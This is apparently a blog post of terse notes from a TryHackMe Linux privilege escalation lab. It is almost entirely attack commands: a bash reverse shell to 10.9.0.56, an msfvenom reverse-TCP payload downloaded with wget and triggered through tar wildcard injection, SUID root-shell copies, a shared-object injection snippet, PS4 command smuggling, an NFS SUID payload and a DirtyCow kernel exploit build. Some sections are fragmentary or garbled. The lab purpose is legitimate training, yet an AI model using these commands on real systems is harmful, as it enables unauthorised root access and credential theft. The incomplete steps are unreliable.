Linux Privilege Escalation from tryhackme

1.Service Exploits

gcc -g -c raptor_udf2.c -fPIC
gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
mysql -u root

2. Weak File Permissions (Readable /etc/shadow file)

john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

3. Weak File Permissions (Writable /etc/shadow file)

sudo mkpasswd -m sha-512 newpass123

4. Weak File Permissions (Writable /etc/passwd file)

5. Sudo shell escape sequences

sudo -l

6. cron jobs — File Permissions

cat /etc/crontab
locate overwrite.sh
ls -l /usr/local/bin/overwrite.sh
bash -i >& /dev/tcp/10.9.0.56/5566 0>&1

7. cron jobs — PATH Environment Variables

cd /home/user
#!/bin/bash

cp /bin/bash /tmp/rootbash
chmod +xs /tmp/rootbash
chmod +x /home/user/overwrite.sh
/tmp/rootbash -p

8. cron jobs — Wildcards

tar czf /tmp/backup.tar.gz *
tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
msfvenom -l payloads | grep linux
user@debian:~$ uname -a
Linux debian 2.6.32-5-amd64 #1 SMP Tue May 13 16:34:35 UTC 2014 x86_64 GNU/Linux
msfvenom --list formats
sudo msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.9.0.56 LPORT=5555 -f elf -o shell.elf
sudo python3 -m http.server 9999
wget http://10.9.0.56:9999/shell.elf
nc -nlvp 5555
touch /home/user/--checkpoint=1
touch /home/user/--checkpoint-action=exec=shell.elf

9. SUID /SGID Executables Known Exploits

find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null

10. SUID /SGID Shared Objects Injection

lse.sh -l 1 -i | more
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
strace /usr/local/bin/suid-so 2>&1 | grep -iE "open|access|no such file"
mkdir .config
cd .config
#include <stdio.h>
#include <stdlib.h>
static void inject() __attribute__((constructor));void inject() {
system("/bin/bash -p");
}Compile the .c file to create .so file
gcc -shared -fPIC -o libcalc.so libcalc.c
gcc -shared -fPIC -o libcalc.so libcalc.c
/usr/local/bin/suid-so

SUID /SGID Environment Variables

find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
strings /usr/local/bin/suid-env
strace -v -f -e execve /usr/local/bin/suid-env 2>&1 | grep service
service.cint main() {setuid(0);system(“/bin/bash -p”);}
gcc -o service service.c
PATH=.:$PATH /usr/local/bin/suid-env

Abusing Shell Features (Vulnerable shell that allows forward slashes in function name)

find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
/usr/local/bin/suid-env2
strace -v -f -e execve /usr/local/bin/suid-env 2>&1 | grep service
/bin/sh --version
function /usr/sbin/service { "/bin/sh" -p; }
export -f /usr/sbin/service
/usr/local/bin/suid-env2

Abusing Shell Features (Vulnerable shell that displays prompt through a variable in debug mode)

find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
strace -v -f -e execve /usr/local/bin/suid-env 2>&1 | grep service
/bin/bash --version
env -i SHELLOPTS=xtrace PS4=test /usr/local/bin/suid-env2
env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash)' /usr/local/bin/suid-env2
/tmp/rootbash -p
cat ~/.*history | less
su root 

Password stored in Config Files

SSH Keys stored insecurely

ls -al /
ls -l /.ssh
cat /.ssh/root_key
cat /.ssh/root_key
vi root_key
chmod 600
ssh -i root_key root@10.10.121.113

Abusing NFS Vulnerability

./lse.sh -l 1 
showmount -e <victim ip>
mkdir /tmp/nfs
mount -o rw,vers=2 10.10.41.239:/tmp /tmp/nfs
msfvenom -p linux/x86/exec CMD="/bin/bash -p" -f elf -o /tmp/nfs/shell.elf
chmod +xs /tmp/nfs/shell.elf
/tmp/shell.elf

Kernel Exploits

perl /home/user/tools/kernel-exploits/linux-exploit-suggester-2/linux-exploit-suggester-2.pl
gcc -pthread /home/user/tools/kernel-exploits/dirtycow/c0w.c -o c0w
./c0w
/usr/bin/passwd
mv /tmp/bak /usr/bin/passwd
exit

--

--

--

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

What Is Protected Health Information (PHI)?

{UPDATE} Freeze Whiz Hack Free Resources Generator

{UPDATE} Music Game Do Re Mi Hack Free Resources Generator

Privacy Diaries: Microsoft and it’s Malicious GIFS

Hack The Box — Active

What is Proxy Server?

Cyber Security

TryHackMe — Skynet

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Sheetal Patil

Sheetal Patil

More from Medium

Some Thoughts on Deterministic Netcode in GameMaker

Managing, Grouping, and Structuring Terraform IAC in Gitlab

Using Octoprint on Rapberry Pi w/ WPA2 Enterprise

HackTheBox: Oopsie WalkThrough